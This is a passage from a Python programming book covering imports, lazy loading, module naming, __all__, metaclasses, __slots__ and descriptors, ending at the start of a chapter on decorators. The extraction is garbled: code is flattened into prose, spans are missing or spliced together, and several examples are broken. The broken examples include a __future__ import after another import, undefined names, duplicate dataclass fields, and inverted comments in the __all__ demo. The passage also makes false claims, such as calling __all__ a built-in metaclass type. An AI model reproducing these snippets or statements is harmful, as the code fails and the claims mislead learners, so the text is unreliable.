For the usual circular imports, most modern linters will issue a warning that can be manually handled. However, for cases that involve issues due to type hinting, the solution discussed in the following section should be effective. Let us say we have two modules – alpha.py and beta.py that are dependent. alpha.py creates an interface for a REST end point, and instantiates an object of

# Sript: alpha.py from beta import Beta

class CreateAlpha: def get_beta(self ) -> Beta: return Beta(alpha=self )

The Beta class is defined to hold a reference to the connection:

# Script: beta.py from alpha import CreateAlpha

class Beta: def __init__(self, alpha: CreateAlpha): self._conn= alpha It is evident that the preceding scenario will result in the interpreter generating a stack trace for circular imports: file "main.py" from alpha import CreateAlpha file "alpha.py" from beta import Beta file "beta.py" from alpha import CreateAlpha ImportError: cannot import name 'CreateAlpha' from 'alpha' In the beta.py script, only the CreateAlpha type hint being used requires the import of the alpha module. The naïve approach to

resolving this would be to simply drop the type hint. The smarter approach would be to use Conditional Imports defined in the following section.

Using conditional imports with type hints

A not very well known approach for such instances is conditionally importing the required modules only when the execution occurs in the type hinting mode. We can use the constant TYPE_CHECKING which is part of the typing module to effectively implement this.

# Script: beta.py from typing import TYPE_CHECKING # Check whether type checking is enabled if TYPE_CHECKING: from alpha import CreateAlpha

class Beta: def __init__(self, alpha: 'CreateAlpha'): self._conn = alpha

This will now resolve the circular import issue even when type hints are enabled.

As per PEP-563 (Postponed evaluation of Annotations), with the advent of Python 3.7, you can explicitly supply the type hints sans the quotes. However, for that to work, you will need to import the annotations as `from __future__ import annotations`.

Singleton nature of imports in Python

When a Python script loads a module in the course of execution, the code is executed and initialized only once. If some other part of the code tries to import the same module, the initialization does not take place again. You can say that the module level variables are singleton in nature, that is, single initialization only. On the positive side, this behaviour can be taken advantage of during the object initialization. Even before the term Singleton Pattern was coined for the system design, Python was already using Singleton as a concept. In Python, the modules being singleton means that only one copy of it is loaded into memory at the first import. Any subsequent import simply returns the same loaded object. A small snippet to see this concept in action is as follows:

from typing import Optional from __future__ import annotations class HelperMetaClass(type): """We can implement Singleton classes in Python in multiple ways, including decorators, metaclasses and base parent classes among others. Let's use a metaclass for this example. """ _object: Optional[MySingletonClass] = None

def __call__(self ) -> MySingletonClass:

if self._object is None: self._object = super().__call__() return self._object

class MySingletonClass(metaclass=HelperMetaClass): def do_something(self ): """The executable business logic for this

instance""" # …

if __name__ == "__main__": # End User Code. s1 = MySingletonClass() s2 = MySingletonClass()

if id(s1) == id(s2): print("Correct Singleton, same instance for both variables") else: print("Wrong Singleton, different instances for variables")

Can you figure out what the result of the preceding code would be?

Lazy imports for Python modules

Sometimes, the huge stack of import statements on the top of your script can not only be scary but also lead to increased memory usage and load times for heavy applications. It is possible to take advantage of Python’s open constructs to achieve a lazy loading mechanism, which will only load the module on demand. One such class is present in the TensorFlow library, which they use to load the contrib module. Since the code does not have any dependencies, I will simply copy it here and then discuss how it works.

# Source https://github.com/tensorflow/tensorflow/blob/master/tensorflow/pyth on/util/lazy_loader.py

"""A LazyLoader from __future__ from __future__ from __future__

class.""" import absolute_import import division import print_function

import importlib import types

class LazyLoader(types.ModuleType):

"""Lazily import a module, mainly to avoid pulling in large dependencies. `contrib`, and `ffmpeg` are examples of modules that are large and not always needed, and this allows them to only be loaded when they are used. """ def __init__(self, local_name,parent_module_globals, name): self._local_name = local_name self._parent_module_globals = parent_module_globals

super(LazyLoader, self ).__init__(name)

def _load(self ): # Import target module and insert # in the parent's namespace module = importlib.import_module(self.__name__) self._parent_module_globals[self._local_name] = module self.__dict__.update(module.__dict__) return module

def __getattr__(self, item): module = self._load() return getattr(module, item) def __dir__(self ): module = self._load() return dir(module) Source: TensorFlow Lazy Loader - Github Repository

This mechanism of lazy loading modules works by initializing a dummy module at the initialization stage, and when the lazy loader is invoked, the actual module is loaded and replaces the dummy module. The invocation looks something like the following: contrib = LazyLoader('contrib', globals(), 'tensorflow.contrib')

This has the same effect as executing the following import at the beginning: import tensorflow.contrib as contrib

In order to ensure that the globals are correctly updated with the lazily loaded module, we extend the ModuleType from the types library. In addition, you can access all of the attributes in the module by the implementation of the __getattr__ method.

Similarly, the tab complete in an interactive ipython shell is enabled by the implementation of the __dir__ method.

Calling one of these methods, triggers a load of the original module, which then updates the globals to reference the original module, and all the references in the state of the lazily loaded module is updated to that of the original module. This prevents reloading the module every time it is referenced thereafter.

Features of Python module imports

In practical situations, importing modules seem trivial and they happen to be taken for granted. However, the more we dive into complex Python code, the more we feel the need to understand the intricacies of how imports and modules are handled internally by Python. Some examples of such use cases might be as follows:

Let us take an example of the mathematical operations library in the core Python library. Sometimes, you need a non-standard implementation of certain mathematical operations, and you might want to give them the same name for relevance and ease of use. In that case, if you import both the modules, which one takes precedence?

Relative versus absolute imports should also be tricky. We know what packages are – they are a collection of relevant and associated modules, as well as being modules themselves.

In this section, we will take a look at some of the lesser known usages and tricks of the import statement.

Can modules use characters besides English?

Theoretically, module names can be composed of any language characters or even punctuations. The standard library and core Python modules, all have English names, but Python is flexible with that. For ease of access and readability, you can use your mother tongue or any other language, to name your modules when needed. Even though it is not a good idea for distributable code, Python still allows it. $ echo "print('Hello')" > $ python3 Hello

In the preceding snippet, we created a module that prints “Hello”. In India, नम े refers to Hello in the Hindi language. You can see that Python has no issues in identifying or executing the script, despite the non-English characters.

Python makes use of the Unicode character set, therefore also allows you to use non-English characters for variable assignments. Isn’t that cool? Not just other languages, you can even use English punctuations in your module names. >>> from string import punctuation as symbols >>> print(symbols) !"#$%&'()*+,-./:;?@[\]^_`{|}~

The above shows the symbols that Python identifies as punctuations. We have seen some of these characters used in Unix file names, but can they be used for naming Python modules? Let us look at the following example:

$ echo "print("Hello")" > saying-hello-to-you.py $ python3 saying-hello-to-you.py Hello

In the above example, the hyphen is used in the module name and we see that Python executes it as expected. However, we notice the first signs of problems when we try to import this in the other scripts or interactive shells. >>> # External Module … import saying-hello-to-you … def myFunction(myArg): … call_some_method() import saying-hello-to-you ^ SyntaxError: invalid syntax Now, what happened here? To understand this, we need to revisit the variable naming rules in Python. Python allows you to use only the underscore in naming your variables, and no other punctuations. That is why the importable scripts cannot use other special characters.

This may not always be bad. Think about a use case where you want to create a script only for standalone execution, but want to restrict the explicit imports to that module. The punctuations can be a good hack.

However, is that fool proof? Definitely not. The workaround importing the modules that have punctuations or special characters as constituents is also provided by Python. There is a built-in method called __import__ which helps to load a module similar to the imports at the top of the file. >>> __import__('saying-hello-to-you') … def myFunction(myArg): … call_some_method()

Hello

The __import__ method takes the string representation of the module and loads it. It is internally used as part of the import statement, and is more flexible as it can operate on any string formatted module names. In fact, you can even use white space separated multi-word names for modules – look at the following example: In [4]: !touch "hello world.py"

In [5]: __import__("hello world") Out[5]: 'hello world' from 'hello world.py'> In [6]: import hello world File "", line 1 import hello world ^ SyntaxError: invalid syntax

The import statement is compliant with Python naming rules, while the __import__ statement is not. Both are still usable.

Do Python modules need the .py extension?

From the time we started learning Python, we are habituated to name our modules with the .py extension. However, unlike Java or C++, the .py extension is not all mandated by Python for its modules and scripts. Let’s run the following small test:

echo "print('I have the .py extension')" > withExtension.py echo "print('I ain't got an extension')" > noExtension python3 withExtension.py python3 noExtension

I have the .py extension I ain't got an extension

It is evident that the .py extension is insignificant for a script to be executed as a Python script. However, like always, there is a catch here – let us see what happens when we try to import this script:

import withExtension # Works import noExtension ModuleNotFoundError: No module named 'noExtension'

We see that despite the two scripts being present in the same folder, the one without the extension raises a This is primarily because Python mandates the naming of modules and scripts with the .py extension, due to the ease of identification as Python modules.

Similar to what we discussed in the previous section, you can also use the .py extension hack to create a script only for standalone execution, but it would restrict the explicit imports into that module.

Therefore, the two salient features that we discussed about Python module naming are as follows:

The non-English characters are possible to be used in module names, although they are not encouraged. Python mandates the use of .py extension. If you skip that, you can execute the module, but NOT import it.

Can a module be available across the system?

Okay. You write a custom module, something cool, and you now want other people to use the module as well. One way is to distribute it, and make every one use that code. However, in organisations where code is the Intellectual Property, how do we ensure that custom modules that we write are available at a system level for all the users?

Let us take an example of a wrapper for computing the runtime of a method or codeblock and implement this with a decorator.

def get_runtime(method): import time def code_time_func(*args, **kwargs): start = time.time() func_call_result = method(*args, **kwargs) end = time.time() print("Execution time: ", method.__name__, " : ", end-start) return func_call_result return code_time_func We will discuss decorators in more detail, further in the book. In short, a decorator function takes in a function as an argument and returns a wrapper function as a result. This can add

additional functionality to the original method. To use it in the same directory/module, we can use the following:

@get_runtime def iterate_and_print(num): for index in range(0, num+1): print(index)

@get_runtime def get_fibonacci(num): int1 = 0 int2 = 1 if num> ~/.bashrc

What happens with modules having the same name?

You can theoretically install different modules having the same importable name, or you can have a library module and an overriding custom module with the same name. So, how does the interpreter decide which of these modules to pick up when the import statement is executed? The system path decides the key to this.

import sys print(sys.path)

['/usr/local/bin', '/usr/local/Cellar/python/3.7.4_1/Frameworks/Python.framework/Versi ons/3.7/lib/python3.7', '/usr/local/Cellar/python/3.7.4_1/Frameworks/Python.framework/Versi ons/3.7/lib/python3.7/lib-dynload', '', '/Users/sonalraj/Library/Python/3.7/lib/python/site-packages', '/usr/local/lib/python3.7/site-packages', '/usr/local/lib/python3.7/site-packages/aptpython-0.1-py3.7.egg', '/usr/local/lib/python3.7/site-packages/IPython/extensions', '/Users/sonalraj/.ipython'] The Python interpreter will serially search the directories present in the and look for the required module in that order. If a module is found, the search will exit, and the module will be imported. If

the whole list has been searched and the required module is not found, then a ModuleNotFoundException is raised.

As discussed earlier in the chapter, the order in which Python prioritizes the module search is as follows:

The current working path.

All paths that are part of the PYTHONPATH variable.

The original install paths of the Python core libraries and third party packages.

One of the elements in the sys.path is ‘’, an empty string, which references the current path.

Now, coming back to what would happen if there were multiple modules with the same name in the installation, which of them would be imported? The answer to this one would be the one that is encountered first in the list. If the custom module path appears before the built-in module, then you have it all figured out.

Decide which imports to expose with __all__

By default, there is nothing private in Python. Therefore, everything that is defined in a module will be imported. In the interactive prompts or notebooks, the tab completion will also show you the constituents in the import.

Python does provide a mechanism to control the explicit import of the content from a module. There is a metaclass built-in type in Python called __all__ which allows the author to control what should be imported by default.

Let us take an example of a module We can put all the specific components that we need to make it importable in the __all__ construct.

# creditCard.py class OutstandingAmount: ….

class CreditLimit: …. class TotalSpends: ….

__all__ = ["OutstandingAmount", "TotalSpends"]

# client_code.py from creditCard import * calculate_payment = TotalSpends() # Raises an exception monthly_payment = MonthlyPayment() # Works Fine

The preceding example does not import everything by default now. However, the classes that are not exposed via the __all__ construct can still be imported by explicitly specifying the class names, instead of a star. from payment import CalculatePayment # Works Fine!!

Python metaclasses

In short, metaclasses are constructs that are used to create classes. Just like classes, when instantiated, create object instances - metaclasses, when instantiated, create other classes and define their behaviour. There are several use cases that metaclasses prove to be very useful for, some of which are as follows:

Class registration at creation/run time. Profiling code or logging.

Dynamic addition of new methods.

Synchronization or automated resource locking.

Creating properties automatically.

Setting up templates for the code.

Every programming language that supports the use of metaclasses, have their own unique way of implementing them. In this section, we will look at some of the nuances of metaclasses in Python.

When are metaclasses needed

You will not come across a requirement of metaclasses every time you code. It comes in handy mostly when you are creating APIs for complex libraries and features. It is a useful abstraction tool for implementation details of your code, while exposing a simple and easy-to-use interface to the library/API.

A simple example of the use of metaclasses is in Django ORM. The ORM API thereby is simple and easy to understand. An excerpt would look like the following:

class Car(models.Model): make = models.CharField(max_length=45) year_of_mfg = models.IntegerField()

>>> car = Car(make="Honda", year_of_mfg=2010) >>> print(car.year_of_mfg)

Here, car.year_of_mfg will not be returning an instance of IntegerField as initialized, rather, an int value is returned. The Django ORM framework defines the which is used to converts the Car class into a complex hook for the fields in the database. Using metaclasses under the hood makes Django convert something complex into simple exposed API.

In Python 3, a new class created can be instructed to use a metaclass by passing a predefined type as an argument. These are sometimes referred to as Magic methods. The common ones (in order of invocation) are as follows:

This method is invoked when a class is initialized based on some metaclass provided.

This magic method initializes values post object creation.

For attribute storage, the namespace of the mapping is defined by this magic method. This magic method uses the constructor for creating an object of the new class. These methods can be overridden by the user in the custom metaclass you are writing, in order to enforce a different behaviour to it, compared to the default metaclass – type. These help to build beautiful APIs. The source codes of some of the popular libraries in Python including requests, flask, and so on, make extensive use of metaclasses for generating simple end-user APIs.

You should turn to metaclasses when you feel that using the basic Python code is making your APIs complex to use, and

increasing the length of the code more than it is needed. In that case, write boilerplate code to achieve the simplicity.

Validating subclasses with the __new__ method

The __new__ magic method is used when initializing a class to an instance. You can play around and tweak the process of creating the instance by using this method. In order of execution, __new__ is called before the __init__ method is invoked in the initialization process.

The class instance can also make use of the super() method to invoke the default __new__ method of the parent class. class Car: def __new__(cls, *args, **kwargs): print("Instance creation in progress…") my_inst = super(Car, cls).__new__(cls, *args, **kwargs) return my_inst

def __init__(self, make, model): self.car_make = make self.car_model = model

def car_details(self ): return f "{self.car_make} {self.car_model}" >>> vehicle = Car("Honda", "City") Instance creation in progress…

>>> vehicle.car_details() Honda City

The preceding example shows what you can do with the magic methods, and the order in which it is executed with reference to other methods.

What more can you do with __slots__ ?

Let us discuss a way to give a boost to the speed of your Python code. You will be thankful for this when you solve some of those online competitive or hiring tests, which judge you on the time taken to run those test cases. For this, we will see how we can use the __slots__ attribute. Some of the reasons why it is encouraged to use slots are as follows:

Since data structures are optimized with Slots, attributes are stored and retrieved faster.

Reduction in memory usage when instantiating classes.

As touched upon in a previous chapter, when defining a class in Python, __slots__ can be used to specify which attributes the instances of the class should possess. This specification helps to save some space usage and enables quicker access to the attributes. Let us take the following example to compare both these cases:

class UsingSlots: __slots__ = "alpha" class NotUsingSlots: pass

using_slots = UsingSlots() not_using_slots = NotUsingSlots()

using_slots.alpha = "Alpha" not_using_slots.alpha = "Alpha"

In[2]: %timeit using_slots.alpha Out[2]: 39.4 ns

In[3]: %timeit not_using_slots.alpha Out[3]: 51.05 ns

We notice that using slots is performant in execution time as they give the interpreter an idea of how to optimally handle the data structure behind the scenes. Python 3 slots usage have been known to show about a 30% speedup.

Slots also help to save memory or space used to store the instances by a significant amount. If you analyse the space usage from the preceding example, you will see the results similar to the following, depending upon your system architecture: In [4]: import sys

In [5]: sys.getsizeof(using_slots) Out[5]: 28

In [6]: sys.getsizeof(not_using_slots) Out[6]: 35 So, we see that objects save up considerably on space usage when slots are used. However, the followup you might have is how to decide, when we want to use

Instantiating a class leads to the allocation of additional space to include the __dict__ and __weakrefs__ data. The __dict__ is composed of all attributes which describe the instance and is writable in nature. When we do not wish to allocate additional space for __dict__ by defining the custom __slots__ feature, it limits what Python should initially allocate. When you use the child class will not create the thereby saving space and boosting performance. This is illustrated as follows: class ParentClass: __slots__ = () class DerivedClass(ParentClass): __slots__ = ('alpha',)

obj = DerivedClass() obj.alpha = 'alpha' Hence, it is recommended to use __slots__ in a majority of cases, when the time and space optimization is absolutely necessary or worthwhile.

However, slots should not be used in other cases since they limit the way in which classes can be used, in particular, the dynamic variable assignment. The following code snippet illustrates this: class Car(object): __slots__ = ("car_make",) >>> car = car() >>> car.car_make = "Honda" >>> car.car_model = "City" AttributeError: "Car" object has no attribute "car_model" Python allows some methods to work around these issues, the most common one being discouraging the use of However, a small compromise can help with achieving the dynamic assignments, which is illustrated as follows:

class Car: __slots__ = car_make, "__dict__" >>> car = User() >>> car.car_make = "Honda" >>> car.car_model = "City" In this method, we give up the memory utilization benefits, but by including the __dict__ as part of the __slots__ property, we get to keep our dynamic assignment of variables property.

Some of the other use cases where __slots__ usage is discouraged are as follows:

While creating a subclass of a built-in type (e.g., str, tuple, list, and so on) and planning to amend or ad attributes to it. Setting the instance variables’ default values for the attributes of the class.

Bottom line – choose to use __slots__ when you really need that reduction in space/memory usage and performance in execution time.

Metaclasses for changing class behaviour

As we discussed earlier, the __call__ magic method helps in controlling how an object of a class is created. Take a case where we do not want the end user to directly create objects of the class we are creating. How can we achieve that? That is one of the cases where the __call__ method comes into the picture.

class NonInstanceClass: def __call__(self, *args, **kwargs): raise TypeError("This class cannot be instantiated!!")

class Car(metaclass=NonInstanceClass): @staticmethod def write_car_make(car_make): print(f "Make of Car: {car_make}")

>>> car = Car() TypeError: This class cannot be instantiated!!

>>> Car.write_car_make("Honda City") Make of Car: Honda City The overridden __call__ method in the example ensures that the user cannot create an object of the class, since we have wired it to throw an exception when tried.

Another use case could be when we are writing an API when a custom design pattern needs to be implemented and the end user should be able to easily use the API. Look at the following simple example:

class MathOperations: """A class wrapper for mathematical operations for two integers.""" def __init__(self, optr): self.optr = optr

def __call__(self, num_one, num_two): if isinstance(num_one, int) and isinstance(num_two, int): return self.optr() raise ValueError("Enter the 2 integers")

def addition(self, num_one, num_two): return num_one + num_two def product(self, num_one, num_two): return num_one * num_two >>> toSum = MathOperations(addition) >>> print(toSum(22, 35)) 57

>>> toProduct = MathOperations(product)

>>> print(toProduct(15, 10)) 150 The preceding example illustrates the dynamic selection of methods or snippets without any logic duplications. The __call__ method in the example helps to make the API simpler.

Let us consider another scenario where we want to create a cached instance. During the creation of an instance, when the same values are passed, you want the object to be returned from the previous cached initialization. Therefore, no instance should be created for the duplicate values of the parameters. The following example illustrates that: class MyCachedClass(type): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.__cacheData = {} def __call__(self, _id, *args, **kwargs):

if _id not in self.__cacheData: self.__cacheData[_id] = super().__call__( _id, *args, **kwargs) else: print("Class Instance already exists!!") return self.__cacheData[_id] class ClientClass(MyCachedClass): def __init__(self, _id, *args, **kwargs):

self.id = _id def trial(): alpha = ClientClass(id="alpha") beta = ClientClass(id="alpha") print(id(alpha) == id(beta)) The preceding utility method will result in True since the instantiation of beta will happen with the same instance retrieved from cache.

I hope that the preceding examples of __call__ illustrates some of the use cases where metaclasses make life easier. There are several other use cases for the __call__ method, including Singleton implementations, memoizations and decorators.

You can dig more into the features of metaclasses for a lot of other complicated tasks that can be optimized. For more information, check the official Python documentation at

Descriptors in Python

Descriptors in Python refer to objects that implement the descriptor protocol and give the programmer the power to create other objects that can have specific functions, which are accessed similar to attributes of the object. The descriptor protocol includes the following four methods:

__get__(self,obj,type=None)->object __set__(self,obj,value)-> None __delete__(self,obj)-> None __set_name__(self,owner,name)

If your descriptor implements just .__get__(), then it’s said to be a non-data descriptor. If it implements .__set__() or .__delete__(), then it’s said to be a data descriptor. It is not just about the name, the behaviour of the descriptor types are also quite different. Data descriptors enjoy a higher precedence in the process of lookup.

Descriptors in Python work on the object’s dictionary in order to work on its attributes. When an attribute is being accessed, the look up chain is triggered, and the corresponding descriptors are invoked for finding the attributes.

Practically, when setting or getting attributes on an instance, some additional processing is required before the getters and setters are used on the attribute values. The descriptors help to add custom operations and validations directly, sans any additional function being called. Let us witness this with the following example:

import random

class GameOfDice: def __init__(self, sides_of_dice=6):

self.sides_of_dice = sides_of_dice def __get__(self, instance, user): return int(random.random() * self.sides_of_dice) + 1 def __set__(self, instance, val_number): print ("Latest Drawn Value: {}".format(val_number)) if not isinstance(instance.sides_of_dice, int): raise ValueError("Please enter a number") instance.sides_of_dice= val_number class PlayTheGame: roll_1 = GameOfDice() roll_2 = GameOfDice(9) roll_3 = GameOfDice(21) >>> myGame = PlayTheGame() >>> myGame.roll_1

2

>>> myGame.roll_2 4

>>> myGame.roll_3 = 9 Latest Drawn Value: 9

>> myGame.roll_1 = "9" ValueError: Please enter a number In the preceding example, the __get__ descriptor is used to add to the functionality of the class, regardless of any additional function. We are also taking advantage of the __set__ method to ensure that the type of data passed is of int type only. The following summarizes the descriptor operations:

__get__(self, instance, owner): The default method to be called when an attribute is accessed.

__set__(self, instance, owner): The default method to be called when the value of an attribute is set using the = operation. __delete__(set, instance): The default method that is called when you want a particular attribute to be deleted.

Several use cases warrant the use of descriptors for enhanced control over the code. Situations like attribute validations, read-only attribute setup, and others need good understanding of descriptors and help to write cleaner code without setting up specific functions for each use case.

Conclusion

In this chapter, we learnt some of the most important Python fundamentals and their nuances. Modules are a collection of correlated Python code, which can define functions, variables, or even classes. They can contain executable code as well.

Metaclasses and metaprogramming have a lot of power and provides several flexibilities to the developer to write clean, performant, and easy to use code. One downside is that metaprogramming can introduce a good amount of complication in the code itself. In many cases, an elegant solution can be achieved using the decorator protocol. Metaclasses should be used when the need of the hour is more generic code, that is simple to use, rather than simple code.

In the next chapter, we will be taking a dive into decorators and context managers in more detail.

Key takeaways

You can use the __init__.py file to control what modules from any level of the package are visible to the external world.

The special value of the string __main__ for the __name__ variable indicates that the Python interpreter will be executing your script and not importing it. You can create obfuscated zipped packages of your project code, bundled with a which can be run as a standalone executable, since Python can run code from the zip archives as well.

The naïve approach to resolving circular imports would be to simply drop the type hints. The smarter approach would be to use Conditional Imports, which check whether TYPE_CHECKING is enabled.

In Python, modules being singleton mean that only one copy of it is loaded into memory at the first import. Any subsequent import simply returns the same loaded object.

We can implement Singleton classes in Python in multiple ways, including decorators, metaclasses, and base parent classes, among others.

If you want to create a script only for standalone execution, but want to restrict explicit imports into that module, punctuations in the name can be a good hack!

The ‘import’ statement is compliant with the Python naming rules, while the __import__ statement is not. Both are still usable.

A script without the .py extension is also a valid script to be executed from the terminal. However, you cannot import such a script as Python mandates using a .py for identification as modules. Use __all__ to decide which components of a script are exposed for import by default when an import * is executed. However, this does not hide components from the explicit imports.

You should turn to metaclasses when you feel that using basic Python code is making your APIs complex to use, and increasing the length of the code more than it is needed. In that case, write boilerplate code to achieve the simplicity. Using __slots__ is performant in execution time as they give the interpreter an idea of how to optimally handle the data structure behind the scenes. Python 3 slots usage have been known to show about a 30% speedup. Choose to use __slots__ when you really need that reduction in space/memory usage and performance in execution time.

When setting or getting the attributes on an instance, some additional processing is required before the getters and setters are used on the attribute values. The descriptors help to add the custom operations and validations directly, sans any additional function being called.

Further reading

Daniele Bonetta, GraalVM: Metaprogramming inside a polyglot Toni Mattis, Patrick Rein, Robert Hirschfeld, Ambiguous, informal and unsound: metaprogramming for

Kerry A. Seitz, Tim Foley, et. al. Staged metaprogramming for shader system Rodin T. A. Aarssen, Tijs van der Storm, High-fidelity metaprogramming with separator syntax

CHAPTER 5 Pythonic Decorators and Context Managers

“Great things are done by a series of small things brought together.”

— Vincent Van Gogh

Decorators are constructs which were introduced in Python with PEP318, to provide the ability to add extra functionality to existing code in a dynamic manner. As we have seen, this feature of updating a fragment of a program by another is sometimes referred to as metaprogramming. Decorators in Python are nothing like the Decorator Pattern in software design. They are functions that take another function as an input and extends or modifies the behaviour of the function explicitly. Similarly, context managers help in writing safer, resilient, and fault-tolerant code in Python. Both Decorators and Context Managers are powerful functionalities, and they can really help enhance your Python code base.

Structure

Decorators and Context Managers make the code and the developer’s life better, but there are humongous amount of discussions to be had around them. Within the scope of this book, broadly, the following areas will be covered in this chapter:

Understand decorators, their usage, and several implementation details. Patterns for writing performant, optimal, and effective decorators.

The DRY Principle and Separation of concerns in Decorators.

Learning about Context Managers and their several practical use cases.

Objectives

By the end of this chapter, you will have insights into how to effectively integrate and implement Decorators and Context Managers in your code, along with the following:

Learning how to create custom decorators for dynamically extending the existing functions in your code without structurally modifying them. Creating localized scope in the code, binding the entry and exit in the section using Context Managers for performing some operations. You will be able to think through how to create safer Python code in production.

Reducing human errors largely by avoiding close statements or termination logics.

Learning about some of the lesser-known use cases of when you should be choosing to use Decorators and Context Managers.

Understanding Python Decorators

A few common use cases of Decorators that most of us are using or have already used in our day-to-day work include the following:

Transforming function parameters

Validating supplied parameters Customizing logging and profiling of code

Enabling code reuse by moving logic to a common place

Enabling retry or other handling on error

Limiting input and output rate of the objects

Caching or memoization of values for faster access

Decorators provide less invasive solutions for most of the preceding problems and reduce the risk of introducing bugs in the code. They can be configured to run before and/or after the objects that have been wrapped within it. Code injection into the function, class, or object can be achieved with decorators. This behaviour can prove to be useful in a ton of scenarios.

Decorators are powerful constructs and most of the well-known API libraries including the likes of Flask, make use of Decorators to create robust APIs. In this section, we will look at some of the key features of decorators.

Décoration of functions

The simplest unit of object in Python which decorators can be applied to are functions. There are a plethora of use cases for which we prefer to use decorators – be it parameter validations, execution conditions, modification of the behaviour of a function, modification of the number and types of arguments it accepts, caching or memoization of outputs, and many others. As an example, let us write a custom Exception decorator that reruns the function for a limited number of time when a certain exception has been encountered:

import time from functools import wraps

def rerun(ExceptionTuple, tries=4, delay=3, backoff=2): def retry(func): @wraps(func) def run_again(*args, **kwargs): maxtries, maxdelay = tries, delay while maxtries > 1: try: return func(*args, **kwargs) except ExceptionTuple as e: print(f "Failed {str(e)}! Retrying in {maxdelay} seconds…") time.sleep(maxdelay)

maxtries -= 1 maxdelay *= backoff return func(*args, **kwargs) return run_again

return retry

We will discuss the significance and use of @wrap later in this chapter. The underscore is also a valid name for an unused variable. This decorator is simple and unparameterized and can be applied to any method. Take the following example: @rerun(Exception, tries=4) def schedule_task(command): """schedules a task, throws an Exception when resources are busy""" return task.run()

As we have learnt in the previous section, the @rerun is just a visually appealing and aesthetically nice way of interpreting:

schedule_task = rerun(schedule_task,…) In this small example, we saw how decorators could be leveraged to create a mechanism to rerun a function when it throws an exception for a certain number of times. This can be especially helpful when getting resources from an endpoint URL over the network, or resource connection establishment like those to the databases where sometimes connections time out. The decorated functions can be of help in such cases.

Decoration of classes

The syntactic considerations of decorating classes is the same as what we saw for functions. The only difference being that, just like in the function decorator the inner wrapper was taking a reference to a function as an argument, the class implementation should accept a class as an argument and handle the logic accordingly.

There are both pros and cons of decorating classes. If judiciously used, the classes could be decorated with additional/external methods and attributes, which operate behind the scenes. However, overdoing class decoration can make the code illegible and convoluted. We will discuss more benefits and concerns in the Separation of Concerns section of this chapter.

Some of the lesser-concerned advantages of the class decorators are outlined below:

All the merits of reusing code including reduced complexity and number of lines of code, as well as the DRY Repeat principle. A good example could be to have a decorator that ensures that different classes adhere to some common interface or checks. With a decorator based design, the initial size of classes will be less, and they can be upgraded later with the help of decorators.

The maintainability of code is improved with decorators, since now the changes to the common or similar logic happens in one place and there is lesser risk of missing the changing of some corner code path. It is simpler compared to metaclasses.

Among the several uses of decorators, let us take an example, which will illustrate the points we had discussed about the usefulness of decorators around classes.

Let us design a class for a system that handles different classifications of data, which are then sent across to an external system. Each type of data might have different aspects to be handled before sending it across. For example, login information might be sensitive and need to be hidden, or hashed or obfuscated. The time-based fields might need conversions or changes in their display format. The initial step would be to write this event data handling class and chart out the different parts: class SerializeMessages: def __init__(self, Message): self.message= message def serialize(self ) ->dict: return { "login_name": self.message.login_name, "access_key": "**redacted**", "connection": self.message.connection, "timestamp": self.message.timestamp .strftime("%Y-%m-%d%H:%M"), }

class LoginMessage: MESSAGE_SERIALIZER = SerializeMessages def __init__(self, login_name, access_key, connection,timestamp): self.login_name = login_name self.access_key = access_key self.connection = connection self.timestamp = timestamp def serialize(self ) -> dict: return self.MESSAGE_SERIALIZER(self ).serialize() This class would work well to parse out the basic login messages and serialize them after operating on the fields for protection and formatting. However, when you try to scale this in the near future, you will run into some of the following unintended concerns: Increasing number of classes: When the data size and type increases, there will be more classes to handle the different types of data.

Rigid approach: Let us say, we want to avoid the duplication and reuse some parts of the code in the classes – the approach would be to move that to a function and call it from all the places. The limitation remains that you have to invoke it many times from different classes, which shadows the benefit of reuse. Boilerplate code: The invoked common function should be available in all the classes for every data type. Even extracting it

out to a unique class of its own, would not be very good inheritance. A different but ideal approach here would be to create a single object, which takes in the updation functions as arguments, along with an instance of the message, serializes the object after applying the updation logic. The common serializer can now simply be used on all the different message type based classes. This object can then be used to decorate the class with the serialization logic: from datetime import datetime

# Define the serializer class class SerializeMessages: def __init__(self, message_flds: dict) -> None: self.message_flds = message_flds def serialize(self, message) ->dict: return {field: transformation(getattr(message, field)) for field, transformation in self.message_fields.items() } # MsgSerialization class class MsgSerialization: def __init__(self, **trnsfrm): self.serialzr = SerializeMessages(trnsfrm)

def __call__(self, message_class): def function_serializer(message_instance): return self.serialzr.serialize(message_instance) message_class.serialize = function_serializer return message_class # Define the utility methods def obfuscate_passkey(passkey) -> str: return "**redacted**"

def repr_timestamp(timestamp: datetime) -> str: return timestamp.strftime("%Y-%m-%d %H:%M") def nochange(field_name): return field_name

# Applying the decorator to the class @MsgSerialization( login_name=nochange, passkey=obfuscate_passkey, connection=nochange, timestamp=repr_timestamp, ) class LoginMessage: def __init__(self, login_name, passkey, connection, timestamp): self.login_name= login_name self.passkey= passkey

self.connection = connection self.timestamp = timestamp If you observe, the decorator provides a clean representation of what operations we would be applying for every field. You do not have to rustle through the code to figure out what would happen to the fields. What is essentially happening, is that the decorator here is updating the class it wraps, and adds an additional method to the class called thereby extending the functionality of the class without having to explicitly change it. In fact, using the dataclasses, you could make the implementation even simpler: from dataclasses import dataclass import datetime @MsgSerialization( login_name=nochange, passkey=obfuscate_passkey, passkey=nochange, timestamp=repr_timestamp, ) @dataclass class LoginMessage: login_name: str passkey: str passkey: str timestamp: datetime.datetime

Note that dataclasses are only available natively in Python 3.7 and beyond.

Decoration of other constructs

Having learnt how to use decorators, we have to keep in mind that it is not just the functions or classes that can be decorated, as shown in the examples, you can also apply them to generators, coroutines, or even already decorated objects. Decorators can also be stacked, which we will look into in more detail, later in the chapter.

Let us take the example of a generator and define a decorator to extend its functionality. In a function, you could simply get the result of the inner function and perform your operations in the decorator routine. However, how would you do that with generators when the future values are not even known? That is where the “yield from” construct comes into play:

from time import time import functools

def log_method_calls(function): @functools.wraps(function) def logging_wrapper(*args, **kwargs): t_begin = time() value = yield from function(*args, **kwargs) t_end = time() duration = t_end – t_begin print('Function %s took %f ' % (func.__name__, duration))

return value return logging_wrapper

The result of the preceding decorator applied to the following function would be:

@log_method_calls def demo():

for index in range(10): time.sleep(index) yield index In [4]: tuple(demo()) Function demo took 41.92839 Out[4]: (0, 1, 2, 3, 4, 5, 6, 7, 8, 9)

Decorators are applicable to any object in Python.

Accepting arguments in decorators

Until now, we have seen that decorators can be powerful tools. However, their utility could be manifold, if we were able to customize the functionality of decorators using parameters. Python allows different methods of implementing decorators that take in parameters. In this section, we will be looking at some of those.

